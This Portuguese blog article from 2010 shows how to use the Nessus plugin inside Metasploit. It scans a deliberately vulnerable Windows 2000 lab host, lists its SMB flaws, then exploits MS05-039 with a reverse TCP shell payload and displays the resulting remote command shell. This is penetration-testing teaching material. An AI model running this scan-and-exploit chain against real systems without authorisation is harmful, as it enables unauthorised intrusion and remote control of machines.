você está aqui: Home  → Arquivo de Mensagens

Brincando com o plugin do Nessus para o Metasploit

Colaboração: Alexandro Silva

Data de Publicação: 12 de outubro de 2010

Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.

Para os testes utilizei o seguinte cenário:

  • Host Debian com Nessus e Metasploit
  • Host Alvo com Windows 2000 "bugado até a alma"

Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão

  cd /tmp/pentest_tools/trunk
  svn update
  /opt/nessus/sbin/nessus-update-plugins
  /opt/nessus/sbin/nessus-service &
  ./msconsole
  
  | |                | |     (_) |
  _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
  | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
  | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
  |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
  | |
  |_|
  
  =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
  + -- --=[ 592 exploits - 302 auxiliary
  + -- --=[ 225 payloads - 27 encoders - 8 nops
  =[ svn r10505 updated today (2010.09.28)
  
  msf>

Diversão :)

Carregando o Nessus plug-in

  msf> load nessus
  
  [*] Nessus Bridge for Nessus 4.2.x
  [+] Type nessus_help for a command listing
  [*] Successfully loaded plugin: nessus
  Conectando...
  msf> nessus_connect localhost:8834 ok
  
  [+] Username:
  alexos
  [+] Password:
  *******
  [*] Connecting to https://localhost:8834/ as alexos
  [*] Authenticated
  Listando as políticas existentes no Nessus
  msf> nessus_policy_list
  
  [+] Nessus Policy List
  
  ID  Name    Owner   visability
  --  ----    -----    ----------
  1   attack  alexos  private

Iniciando a varredura

  msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6
  
  [*] Creating scan from policy number 1, called "alexoscorelabs" and scanning 192.168.0.6
  [*] Scan started.  uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
  Finalizada a verredura é hora de checar o relatório
  msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8
  
  [+] Host Info
  
  Port  Protocol  Severity  Service Name  Sev 0  Sev 1  Sev 2  Sev 3
  ----   --------   --------   ------ ------  -----  -----  -----  -----
  0     icmp      1         general       0      2      0      0
  0     tcp       3         general       0      9      0      1
  0     udp       1         general       0      1      0      0
  21    tcp       3         ftp           1      4      2      2
  135   tcp       3         epmap         1      1      0      1
  135   udp       3         epmap?        0      0      0      1
  137   udp       1         netbios-ns    0      1      0      0
  139   tcp       1         smb           1      1      0      0
  445   tcp       3         cifs          1      10     2      12
  1025  tcp       3         dce-rpc       1      1      0      1
  1028  udp       1         dce-rpc       0      1      0      0
  5800  tcp       1         www           1      4      0      0
  5801  tcp       1         www           1      3      0      0
  5900  tcp       3         vnc           1      2      0      1
  5901  tcp       1         vnc           1      3      0      0
  Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo
  msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
  
  [+] Port Info
  
  Port            Severity  PluginID  Plugin Name                                                                                                           CVSS2  Exploit?  CVE            Risk Factor  CVSS Vector
  ----             --------   --------   -----------                                                                                                           -----   --------  ---             -----------   -----------
  cifs (445/tcp)  1         10736     DCE Services Enumeration                                                                                              none   .         .              None         .
  cifs (445/tcp)  1         10785     SMB NativeLanManager Remote System Information Disclosure                                                             none   .         .              None         .
  cifs (445/tcp)  1         10394     SMB Log In Possible                                                                                                   none   false     CVE-1999-0504  None         .
  cifs (445/tcp)  1         11011     SMB Service Detection                                                                                                 none   .         .              None         .
  cifs (445/tcp)  1         10395     SMB Shares Enumeration                                                                                                none   .         .              None         .
  cifs (445/tcp)  1         26920     Windows SMB NULL Session Authentication                                                                               none   false     CVE-1999-0519  None         .
  cifs (445/tcp)  1         17651     Obtains the password policy                                                                                           none   .         .              None         .
  cifs (445/tcp)  3         22034     MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check)           7.5    true      CVE-2006-1314  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
  cifs (445/tcp)  3         19407     MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check)  10.0   true      CVE-2005-1984  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         12209     MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check)                                       10.0   true      CVE-2003-0533  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         12054     MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check)                              10.0   true      CVE-2003-0818  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  1         10859     SMB LsaQueryInformationPolicy Function SID Enumeration                                                                none   true      CVE-2000-1200  None         .
  cifs (445/tcp)  3         22194     MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)           10.0   true      CVE-2006-3439  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  
  cifs (445/tcp)  3         19408     MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check)    10.0   true      CVE-2005-1983  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  
  cifs (445/tcp)  3         21193     MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check)           10.0   false     CVE-2005-2120  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  2         18602     SMB svcctl MSRPC Interface SCM Service Enumeration                                                                    5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp)  2         18585     SMB Service Enumeration via \srvsvc                                                                                   5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp)  3         35362     MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)                 10.0   .         CVE-2008-4834  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  1         26917     SMB Registry : Nessus Cannot Access the Windows Registry                                                              none   .         .              None         .
  cifs (445/tcp)  3         18502     MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check)                      10.0   false     CVE-2005-1206  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         11835     MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check)                                      10.0   true      CVE-2003-0715  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  1         10860     SMB Use Host SID to Enumerate Local Users                                                                             none   true      CVE-2000-1200  None         .
  cifs (445/tcp)  3         11808     MS03-026: Microsoft RPC Interface Buffer Overrun (823980)                                                             10.0   true      CVE-2003-0352  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         11110     MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830)                      7.5    true      CVE-2002-0724  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
  Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution
  msf> use exploit/windows/smb/ms05_039_pnp
  
  msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6
  
  msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp
  
  msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3
  
  msf exploit(ms05_039_pnp)> exploit
  
  [*] Started reverse handler on 192.168.0.3:4444
  [*] Connecting to the SMB service...
  [*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
  [*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
  [*] Calling the vulnerable function...
  [*] Sending stage (240 bytes) to 192.168.0.6
  [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
  [*] Server did not respond, this is expected
  [*] The server should have executed our payload
  
  
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-1999 Microsoft Corp.
  
  
  C:\WINNT\system32>
  C:\WINNT\system32> ipconfig
  ipconfig
  
  Windows 2000 IP Configuration
  
  Ethernet adapter Local Area Connection:
  
  Connection-specific DNS Suffix  . :
  IP Address. . . . . . . . . . . . : 192.168.0.6
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 192.168.0.2

Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.

Fonte: http://blog.alexos.com.br/?p=1996&lang=en

Blog do autor - http://www.alexos.org


 

 

Veja a relação completa dos artigos de Alexandro Silva

Opinião dos Leitores

Seja o primeiro a comentar este artigo
*Nome:
Email:
Me notifique sobre novos comentários nessa página
Oculte meu email
*Texto:
 
  Para publicar seu comentário, digite o código contido na imagem acima
 


Powered by Scriptsmill Comments Script